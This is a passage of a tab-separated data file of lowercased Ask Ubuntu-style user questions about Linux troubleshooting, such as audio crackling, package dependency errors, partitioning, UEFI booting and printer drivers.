113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 duplex/duplex printing - binding edge : none duplextumble *duplexnotumble adjustprintdensity/adjust print density : *text textgraphic textphoto posterprinting/poster printing : *off 2x1 2x2 3x3 4x4 rotate180/rotate 180 degrees : *off on mirrorimage/mirror image : *off on watermark/watermark : *none confidential draft urgent priority hot donotcopy foryoureyesonly reviewcopy topsecret duplicate colurwatermark/color : black blue lime aqua *red fuchsia yellow positionwatermark/position : *middle topleft top topright left right bottomleft bottom bottomright densitywatermark/density : level1 level2 level3 *level4 level5 level6 sizewatermark/size : 10 20 30 40 50 60 *70 80 90 100 correctioncolor/color mode : *epsonvivid adobergb gammavalue/gamma : 1.8 *2.2 brightnessvalue/brightness : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 contrastvalue/contrast : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 saturationvalue/saturation : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 cyanvalue/cyan : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 magentavalue/magenta : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 yellowvalue/yellow : -25 -24 -23 -22 -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 *0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 update : the driver ppd ( /opt/epson-inkjet-printer-201115w/ppds/epson/epson-wf-7520_series-epson-driver.ppd.gz ) does n't contain any size or handling definitions for 11×17 '' paper . my attempts to edit it have not been successful .
308399	ubuntu 13.04 crackling sound on mp3 playback and problems with output sound and microphone jacks in ubuntu/windows7 double installation	i get crackling sound when i play some mp3 files . the files are ok because i checked in other machines . i am using ubuntu 13.04 . as suggested in skype and vlc sounds sizzle/distorted/bad , i tried the following : i edited : /etc/pulse/default.pa by finding the line ( as i do not have the load-module module-hal-detect line ) : load-module module-udev-detect use_ucm=0 i deleted use_cnm=0 and replaced it with tsched=0 then the crackling sound was gone but the volume bar in the sound applet stopped working . i do not delete_cnm=0 and write tsched=0 next to it , the applet works ok but the crackling sound is now present . any solutions would be greatly appreciated . ( please note that the solution given in the above link does not mention the existence of use_cnm=0 after load-module module-udev-detect ) i should also note that i have both windows7 and ubuntu installed . after installing ubuntu and when i am in windows mode , the output and microphone jacks are not working . on the other hand , the laptop speakers seem to be working both as speakers and microphone ( i know because they amplify the sounds of the room i am in ! ) . the output jack is working fine in ubuntu mode but not the microphone jack . i do not know if the 2 problems are related but if you had any suggestions it would be of great help . thanks ! edit : i did that and in my /etc/pulse/default.pa file i now have : # # # automatically load driver modules depending on the hardware available .ifexists module-udev-detect.so load-module module-udev-detect use_ucm=0 tsched=0 .else # # # use the static hardware detection module ( for systems that lack udev support ) load-module module-detect tsched=0 .endif but unfortunately it is still not working properly ... .
308401	most current version of ubuntu i can run on a core 2 duo macbook pro 7,1 ?	sorry if this has been asked a million times . i 've tried searching but am not having any luck . i just installed 10.10 on my mbp 7,1 without issue . however i would like to run a current and supported version . i downloaded the latest ( 13.04 ) and burned the image . when i tried to boot from the disc i get a really glitchy page that is unreadable . after some research it looks like my mbp is not supported on that release . so i ask , what is the most current version i can run ?
308402	how do i `` : set prompt '' by default for a particular program ?	i 'm new to linux . i installed haskell and was going through a tutorial , which showed me i can : set prompt `` ghci > `` to change the prompt . i like the way this looks . how can i make it so that haskell uses this prompt by default , so i do n't have to set it to be that every time ?
308404	how to modify the title bar in elementary desktop ?	i installed elementary desktop in ubuntu 12.04. but for some reason the title bar retains the theme of ubuntu . any advice for this ? can it can be changed ?
308414	how do i find wifi settings ?	i have just installed ubuntu 13.04 in an old dell laptop . i am only using ubuntu in this old laptop . i am not picking up the wireless signal from my wireless router . where is the selection menu in ubuntu ? is this a possible fault of the laptop ? i just wiped out windows vista . is a driver missing for the wireless ? thank you .
308421	how to properly allocate partition space	i want to dual boot ubuntu 12.04 alongside windows 7 on a sony vaio notebook . when the option comes up to drag the divider left or right for setting the partition size , it does not specify which would be the ideal partitioning . i 'm new to ubuntu , and really like it . my question is which way should i move the divider , and how much memory to allocate to each side ? thanks for any help you could offer .
308422	android sdk and path	since i 've downloaded the android development kit as a package ( sdk , eclipse bundled together ) , i extracted it into /opt/android/sdk i ran the command nano ~/.bashrc command and opened the file . now i set the path as below export path= $ { path } : /opt/android/sdk/tools export path= $ { path } : /opt/android/sdk/platform-tools export android_sdk_home = { path } : /opt/android/sdk but it does n't seem to help at all , when i run ddms in command prompt i get error message saying no command ddmds found . if we set the path variable in windows correctly the ddms command would work correctly . i assume its a problem with the way i set the path . can someone please help me out . thanks .
308424	can not start windows	i tried to install ubuntu 12.10 lts and i had made a partition in windows , and i booted from a live cd and tried to install on that partition . the installation did n't work , so i checked the file , and there is a file missing from the .iso . now i am unable to boot from windows and i am running off a slow live session . please help me ! ! p.s when i try to boot windows , it stays on the splash screen trying to boot , and there is n't a way to access the recovery partition . i do n't have windows discs either .
308426	myeclipse asks for virtual memory	i have been trying to install the 2013 version of my eclipse on ubuntu 13.04 and have upgraded the same from ubuntu 12 on-line the installation was normally done with a live cd and mechanism was similar to windows but when i tried installing my eclipse the message it showed was '' my eclipse needs 300+ mb of virtual memory for installation and u have 0 mb of the same '' i am not aware of swap or virtual memory and its usage and even various sites on ubuntu do n't provide sufficient information . kindly help me to solve this particular problem and understand the topic for further use as well . thanks a lot : )
308428	difference between linux headers	what are linux headers ? why are there two headers namely 3.5.0-34 and 3.2.0-48 in my latest ubuntu update ( just an observation ) .
308429	how to remove ubuntu software center	i recently updated 13.04 , and upgraded the kernel . after that , the software center seems not to be working . when i click on the icon , the logo just blinks and nothing happens . is it possible to correct this , or how do i remove the software center . when i issue the command sudo apt-get remove software-center it , asks to remove ubuntu-desktop too . what is ubuntu-desktop , and is it very important for the system ?
308430	error while installing cacti	i tried installing cacti with sudo apt-get install cacti . it displays an error message at the end reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you haverequested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : cacti : depends : php5-snmp but it is not going to be installed e : broken packages can you provide a step by step solution to resolve this error ?
308436	error importing personal pgp key	i re-imported the pgp key into new system install . now when i try to decrypt my backup text file , ubuntu warns me decryption failed . you probably do not have the decryption key . please help , i am new to ubuntu .
308441	what to do if i upgarde to the latest version and the only available kernel does not work ?	so i have a 2005 one-core acer , was great at the time but old now . ubuntu has kept this thing moving forward working very well , however the latest two versions have been heavy on it . most importantly the last one i downloaded worked relatively fine but as i installed updates and kernels those did n't work . example : kernel 3.2 works fine but the newer 3.5 do n't even load up . my question is i i download the latest release and it gets rid of 3.2 and the new one does n't load up how would i manage getting an old kernel up on the grub or put in an older version of ubuntu . thank you and sorry for being so novice at this .
308442	how do i install cinnamon on ubuntu raring ?	how do we install cinnamon in ubuntu raring ? i added deb http : //packages.linuxmint.com/ debian main import backport upstream romeo to the sources list and used apt-get update to update the sources . the result was : fetched 523 kb in 1h 0min 24s ( 144 b/s ) reading package lists ... done w : gpg error : http : //packages.linuxmint.com debian release : the following signatures could n't be verified because the public key is not available : no_pubkey 3ee67f3d0ff405b2 next , i tried installing cinnamon as follows , i get errors ... $ sudo apt-get install cinnamon nemo [ sudo ] password for roshan : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libcogl-pango0 ( > = 1.7.4 ) but it is not installable depends : libcogl9 ( > = 1.9.6 ) but it is not installable depends : libgjs0b ( > = 1.32.0 ) but it is not installable depends : libgnome-desktop-3-2 ( > = 3.2.0 ) but it is not installable depends : libmuffin0 but it is not going to be installed recommends : gnome-themes-standard but it is not going to be installed recommends : cinnamon-screensaver but it is not going to be installed recommends : gir1.2-gjsdbus-1.0 but it is not installable nemo : depends : libgnome-desktop-3-2 ( > = 3.2.0 ) but it is not installable recommends : nemo-fileroller but it is not going to be installed e : unable to correct problems , you have held broken packages . how to correct this ?
308443	partitioning help	does ubuntu partition drives when you install it alongside windows 7 ? i remember reading that the maximum partition allowed is 4 ( or something )
308449	use kde window style in unity	i want to know if its possible to use the kde widget style in unity . basically have all my programs run looking like there in kde but while still allowing me to use unity . i dont want to use the oxygen gtk theme either , i like all the smooth hover animations and such in kde , but thats where my love of kde ends . i know i cant run kwin in unity as unity requires compiz . however i know its possible to use compiz with kde . what sparked the idea was digikam , i use it as my primary photo manager , and i set it to use the oxygen widget style so i could use a dark theme for it . when i changed it all the animations and everything kde works great . in case my question was at all confusing , im basically trying to do this opposite of this guy ; ubuntu is kde styled after install and removal
308453	pm-utils broke my system and did n't fix it when i purged it and all of its dependencies	before i installed pm-utils , closing the lid just turned the screen off . i installed pm-utils , and now the screen turns off and my system crashes , kind of a big issue . i then purged pm-utils and all its dependencies , but my system still crashes when i close the lid ( lovely ) . tested with a live cd , the screen just turns off when the lid is closed , which makes sense . this is an ubuntu 12.04 minimal install , what do i have to edit to get this back to normal ? edit : if i close the lid , wait for two popping noises , open the lid , and then switch to a vt , it returns to the original non-crashing behavior . i am pretty sure this makes no sense . edit : wait nope , it seems to work , except ... .all disk i/o gets stuck . edit : purging dbus fixed it , although i did lose half of my applications in the process .
308461	install apache , php , mysql latest versions not available via apt	i need to install the latest versions of apache , php and mysql that are available on their websites , but the problem is that apt repositories do n't have these updates versions yet . versions that i want : apache 2.4.4 , php 5.4.16 and mysql 5.6.12 . versions available via apt : apache 2.2.22 , php 5.4.15 , mysql 5.5.31 . ubuntu does n't support the above versions of packages . please , i want help ! thanks ! p.s . tasksel also does n't have these versions of packages yet .
308462	i ca n't access ubuntu after windows installation	i install windows after linux and now i ca n't access the linux . is there any way to recover it ?
308464	software update requires additional diskspace on '/boot '	i 'm using ubuntu 12.10 and tried to install important security updates by means of the software updater unfortunately , the operation could n't start and i got the following message : the upgrade needs a total of 25.3 m free space on disk '/boot ' . please free at least an additional 23.4 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . is there a simple way of doing so ? many thanks
308465	does tlp automatically start when my system boots ?	does tlp automatically start when my system boots ? everytime i boot into ubuntu i open a terminal and type sudo tlp startonly then i can find the difference in the system temperature . if tlp doesnt start automatically , is there a way to add it as a startup applications ? and everytime the power mode changes from ac to battery or vice versa i need to again type sudo tlp start . is there a way tlp can switch modes automatically ? as mentioned in this link i did type systemctl enable tlp but i get an error : systemctl : command not found . so what do i do now ?
308467	unstable 13.04 on hp probook 4545s	i installed the latest version 13.04 from your official site , and i have met a lot of problems . wireless connection is unstable and has a weak signal the touchpad is not working correctly bluetooth does not work at all and many applications can not install and run for broken packages . my question is : how can i find a stable version for my hp probook 4545s ? thank you .
308468	wifi connection error ubuntu 13.04	i am new to ubuntu ( been using windows for many years and finally have tried to make the switch . i am using a cisco ae1000 usb wifi adapter to connect to internet . once i boot up , i usually can go for around an hour and then it all cuts out . if i remove the usb adapter and plug it back in i seem to get a few more minutes . i have been using the setup on windows 7 and it works fine there ( if i boot into windows it works still ) . i have been googling for a solution and have come across many things but most people have no connection at all so i am unsure if it is the same issue . the driver i am using is the default one ubuntu installed : rt2800usb lsusb bus 001 device 007 : id 13b1:002f linksys ae1000 v1 802.11n [ ralink rt3572 ] bus 003 device 002 : id 046d : c069 logitech , inc. m500 laser mouse bus 005 device 002 : id 04f3:0103 elan microelectronics corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub does anyone have any ideas ? thank you !
308472	how to share folders with samba	i am sharing one ubuntu pc 's folder with another ubuntu , how it is possible with samba . i have installed samba but i did n't understand how to create . please help me and tell me the procedure of sharing . i am using ubuntu 12.04 version .
308473	looking for a mouse with a couple extra buttons for programming to copy/paste	i 've been browsing dozens of mice today -- microsoft , logitech , razer , steelseries , etc . i 'm looking for an idiot-proof linux/ubuntu/fedora mouse that has extra buttons : left mouse click , right mouse click , scroll wheel , scroll wheel ( standard stuff ) side buttons for thumb forward & back ( usually on mice today ) two additional buttons that i can map to copy and paste so essentially , a standard mouse , plus 2 or 3 additional buttons . i 'd like to program them for custom commands such as ctrl+c and ctrl+v , to help with code editing . al the mice like this seem to have issues in linux . i 'd love to simply find one that is easy to setup . any advice ?
308481	howto run ubuntu with uefi and intel smart response technology	this question has not been answered by the following due to them saying to permanently disabling these features installing ubuntu on a pre-installed uefi supported windows 8 system install ubuntu on windows 8 with intel smart response https : //help.ubuntu.com/community/uefi how can i get ubuntu to boot with uefi and intel smart response technology ( srt ) enabled ? do i have to install ubuntu with them turned on ? if so how ? or can i enable these features after i 've installed ubuntu and still have them function ? i 'm not concerned with keeping windows and am wanting a linux only machine , so i do not have the dual-boot issues that complicate matters . i would like the benefits of ssd caching to apply to the entire file system and not just the os portions or i would just disable srt and install linux on to the ssd . a bit of searching around the net reveals plenty of articles like installing ubuntu on a pre-installed uefi supported windows 8 system that tell how to disable these features . that is not what i want . i 've also found info that suggests that intel supports mdadm and not dmraid , but i do n't know if that means i can install in ahci mode and switch after the install , or if i need to prepare a custom installer somehow . or for that matter if that even applies to srt , as intel have too many similar acronyms that are closely related . symptoms i 've tried the 12.04.2 lts and i 'm currently trying to use 13.04 ubuntu-13.04-desktop-amd64.iso md5 : 8d72e2db7e72e13813731eab37a14d26 the messages i receive and options i choose are : secure boot not enabled try ubuntu without installing error : failure reading sector 0x60100 from 'cd0' error : you need to load the kernel first . press any key to continue ... then it goes back to the screen where i can select `` try ubuntu without installing '' . this behavior is the same with 12.04.2 lts and 13.04 livecd . though sometimes the sector it can not read is 0x0 . this same dvd boots fine in uefi + ahci or legacy bios modes . hardware info i have the dell inspiron 15r special edition dw510268au with a 32gb msata cache and 1tb 5400rpm hdd . while in legacy bios mode the output of sudo hwinfo -- storage 29 : pci 1f.2 : 0104 raid bus controller [ created at pci.318 ] unique id : w7y8.sqqymdbigqa sysfs id : /devices/pci0000:00/0000:00:1f.2 sysfs busid : 0000:00:1f.2 hardware class : storage model : `` intel mobile 82801 sata raid controller '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x282a `` mobile 82801 sata raid controller '' subvendor : pci 0x1028 `` dell '' subdevice : pci 0x0572 revision : 0x04 driver : `` ahci '' driver modules : `` ahci '' i/o ports : 0x4088-0x408f ( rw ) i/o ports : 0x4094-0x4097 ( rw ) i/o ports : 0x4080-0x4087 ( rw ) i/o ports : 0x4090-0x4093 ( rw ) i/o ports : 0x4060-0x407f ( rw ) memory range : 0xc1617000-0xc16177ff ( rw , non-prefetchable ) irq : 42 ( 22089 events ) module alias : `` pci : v00008086d0000282asv00001028sd00000572bc01sc04i00 '' driver info # 0 : driver status : ahci is active driver activation cmd : `` modprobe ahci '' config status : cfg=new , avail=yes , need=no , active=unknown
308486	how to do partition the hard drive while installing ubuntu ?	hi can any one help on partitioning the hard drive ( disk partitioning ) while installing ubuntu , i am unable to find the option .
308489	13.04 , thinkpad x230 , i/o errors after 15-20 minutes working	after last update my system became behave strange . after 15-20 minutes all drives become read only . in terminal i get errors : i/o error , bus error , disk is read only . i checked all my disks by smartctl , everything is ok. $ sudo smartctl -a /dev/sda smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 5681 - # 2 short offline completed without error 00 % 5680 - $ sudo smartctl -a /dev/sdb smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 0 - # 2 short offline completed without error 00 % 0 - part of dmesg : https : //lh3.googleusercontent.com/-ztqvmkjkydi/ubwqiv5hxdi/aaaaaaaav7u/noratehvgiw/w733-h550-no/img_20130615_114744.jpg $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 238.5g 0 disk └─sda2 8:2 0 238.5g 0 part /home/vitali sdb 8:16 0 59.6g 0 disk └─sdb1 8:17 0 59.6g 0 part / $ sudo lshw -class disk *-disk:0 description : ata disk product : m4-ct256m4ssd2 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0009 serial : 000000001141031bd111 size : 238gib ( 256gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000240d5 *-disk:1 description : ata disk product : sata ssd physical id : 0.1.0 bus info : scsi @ 0:0.1.0 logical name : /dev/sdb version : s5fa serial : 1b650715132200000086 size : 59gib ( 64gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=0bb2e31f i tried to move my system from sdb to sda , but nothing changed . dd if=/dev/sdb1 of=~/sdb1.img dd if=~/sdb1.img of=/dev/sda1 kernel : $ uname -a linux sab 3.8.0-25-generic # 37-ubuntu smp thu jun 6 20:47:30 utc 2013 i686 i686 i686 gnu/linux how can i find my problem and fix it ?
308496	remove development files from ubuntu	i was cleaning up for some hard disk space and i remembered installing a bunch of packages with a dev on it . it was for compiling some programs but i do n't do it anymore . is there anyway of removing them without manually picking them out in synaptic , it is very stressing to see a long list of packages with a dev on it
308502	after switching from ubuntu to lubuntu , fan constantly working on maximum	because my hp 6730s did n't work well on ubuntu ( constant hangs , because of the lack of resources ) i changed to lubuntu . now everything works fine ( in terms of speed ) , but the cooler constantly is working on maximum . that did n't happen on ubuntu . can you give me any advice as to where to look for some solution , because i ca n't stand the noise for too long ?
308515	buttons in ubuntu touch toolbar	what is the code to have a toolbar with buttons when programing in qml with the ubuntu components module . i want to make it so that when i swipe a finger from the bottom of the screen the toolbar comes up with buttons on it .
308518	are there any valid layout and writing programms for ubuntu ?	i 'm beginning my phd thesis and really need good writing , layout and reference management programms . i would love to do it with ubuntu but i 'm not sure if it 'll work . i tried lyx & bibtex/jabref but it seems to be better for sciences not for humanites ( citations are a mess ! i tried jurabib but it did n't work ) . i really , really do n't want to use some version of office . do you have suggestions ? anna
308519	can i use libraries for my ubuntu touch app ?	i have created an ubuntu touch app that uses .a libraries that i have written myself . can i use those in ubuntu touch ? if yes , where do i store them and how can i access them ?
308520	how to change the owner of /user/src	i want to copy a folder to the directory /user/src and i ca n't do it because its owner is set to `` root '' and it says i am not the root . but i am in the administrator group . how to change the owner of that folder and/or give me permission to access and modify it ? or how to login as root if this is easier ?
308522	can i use a .settings file for my ubuntu touch application ?	can i use a .settings file for my ubuntu touch application ? or is n't that allowed ? if yes , where should i store it ? i 'm developing an app that creates files for usage in my app . should i use xml for that ? what should i use ? i 'd also like users to exchange those created files with other users that have the same app ( via bluetooth or the net ) . is that possible yet ?
308523	i have broken ubuntu !	i have been having problems with php and phpmyadmin and now , after manually removing php , apache2 a when i install anything from the software centre i get a failure message . i tried to uninstall libapache2-mod-php5 as this seems to be one of the problems : i get a failure message with the following information : installarchives ( ) failed : ( reading database ... dpkg : warning : files list file for package 'mysql-client-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-server-core-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2.2-bin ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'php5-cli ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2.2-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-server-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2-utils ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libmysqlclient18 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libmysqlclient18 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'php5-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2-mpm-prefork ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libdbd-mysql-perl ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libqt4-sql-mysql : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libqt4-sql-mysql : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-client-core-5.5 ' missing ; assuming package has no files currently installed ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 295374 files and directories currently installed . ) removing libapache2-mod-php5 ... egrep : /etc/apache2/mods-enabled/*.load : no such file or directory module php5 already disabled selecting previously unselected package libapache2-mod-php5filter . ( reading database ... dpkg : warning : files list file for package 'mysql-client-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-server-core-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2.2-bin ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'php5-cli ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2.2-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-server-5.5 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2-utils ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libmysqlclient18 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libmysqlclient18 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'php5-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'apache2-mpm-prefork ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libdbd-mysql-perl ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libqt4-sql-mysql : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libqt4-sql-mysql : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mysql-client-core-5.5 ' missing ; assuming package has no files currently installed ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 295367 files and directories currently installed . ) unpacking libapache2-mod-php5filter ( from ... /libapache2-mod-php5filter_5.4.9-4ubuntu2.1_amd64.deb ) ... setting up libapache2-mod-php5filter ( 5.4.9-4ubuntu2.1 ) ... error : the new file /usr/share/php5/php.ini-production does not exist ! dpkg : error processing libapache2-mod-php5filter ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of php5 : php5 depends on libapache2-mod-php5 ( > = 5.4.9-4ubuntu2.1 ) | libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2.1 ) | php5-cgi ( > = 5.4.9-4ubuntu2.1 ) | php5-fpm ( > = 5.4.9-4ubuntu2.1 ) ; however : package libapache2-mod-php5 is not installed . package libapache2-mod-php5filter is not configured yet . package php5-cgi is not installed . package php5-fpm is not installed . dpkg : error processing php5 ( -- configure ) : dependency problems - leaving unconfigured setting up php5-mysql ( 5.4.9-4ubuntu2.1 ) ... no apport report written because maxreports is reached already creating config file /etc/php5/mods-available/mysql.ini with new version cp : can not create regular file /etc/php5/mods-available/mysql.ini : no such file or directory dpkg : error processing php5-mysql ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : libapache2-mod-php5filter php5 php5-mysql error in function : setting up libapache2-mod-php5filter ( 5.4.9-4ubuntu2.1 ) ... error : the new file /usr/share/php5/php.ini-production does not exist ! dpkg : error processing libapache2-mod-php5filter ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of php5 : php5 depends on libapache2-mod-php5 ( > = 5.4.9-4ubuntu2.1 ) | libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2.1 ) | php5-cgi ( > = 5.4.9-4ubuntu2.1 ) | php5-fpm ( > = 5.4.9-4ubuntu2.1 ) ; however : package libapache2-mod-php5 is not installed . package libapache2-mod-php5filter is not configured yet . package php5-cgi is not installed . package php5-fpm is not installed . dpkg : error processing php5 ( -- configure ) : dependency problems - leaving unconfigured when i cancel the failed window , the status of libapache2-mod-php5 is marked as not installed ! i am at the present going through each package to see if i can install them all again through the software centre to try and kill this error . has anyone any idea what i have done and how i can fix it ? update i have now been through all the programmes which are mentioned in the error report as missing and all are installed on the system ! simon @ simon-vgn-ar71e : ~ $ sudo aptitude remove apache2 php5 mysql-server the following packages will be removed : apache2 mysql-server php5 the following partially installed packages will be configured : libapache2-mod-php5 php5-gd php5-mysql phpmyadmin 0 packages upgraded , 0 newly installed , 3 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 168 kb will be freed . setting up libapache2-mod-php5 ( 5.4.9-4ubuntu2.1 ) ... error : the new file /usr/share/php5/php.ini-production does not exist ! dpkg : error processing libapache2-mod-php5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : libapache2-mod-php5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up php5-gd ( 5.4.9-4ubuntu2.1 ) ... creating config file /etc/php5/mods-available/gd.ini with new version cp : can not create regular file â/etc/php5/mods-available/gd.iniâ : no such file or directory dpkg : error processing php5-gd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of phpmyadmin : phpmyadmin depends on php5-mysql | php5-mysqli | php5-mysqlnd ; however : package php5-mysql is not configured yet . package php5-mysqli is not installed . package php5-mysqlnd is not installed . dpkg : error processing phpmyadmin ( -- configure ) : dependency problems - leaving unconfigured setting up libapache2-mod-php5 ( 5.4.9-4ubuntu2.1 ) ... error : the new file /usr/share/php5/php.ini-production does not exist ! dpkg : error processing libapache2-mod-php5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of php5 : php5 depends on libapache2-mod-php5 ( > = 5.4.9-4ubuntu2.1 ) | libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2.1 ) | php5-cgi ( > = 5.4.9-4ubuntu2.1 ) | php5-fpm ( > = 5.4.9-4ubuntu2.1 ) ; however : package libapache2-mod-php5 is not configured yet . package libapache2-mod-php5filter is not installed . package php5-cgi is not installed . package php5-fpm is not installed . dpkg : error processing php5 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : php5-gd phpmyadmin libapache2-mod-php5 php5 ok , i 'm down to just two packages which i am trying to remove , php5-common and php5-cli . php-cli refuses to delete and php5-common throws the error below :
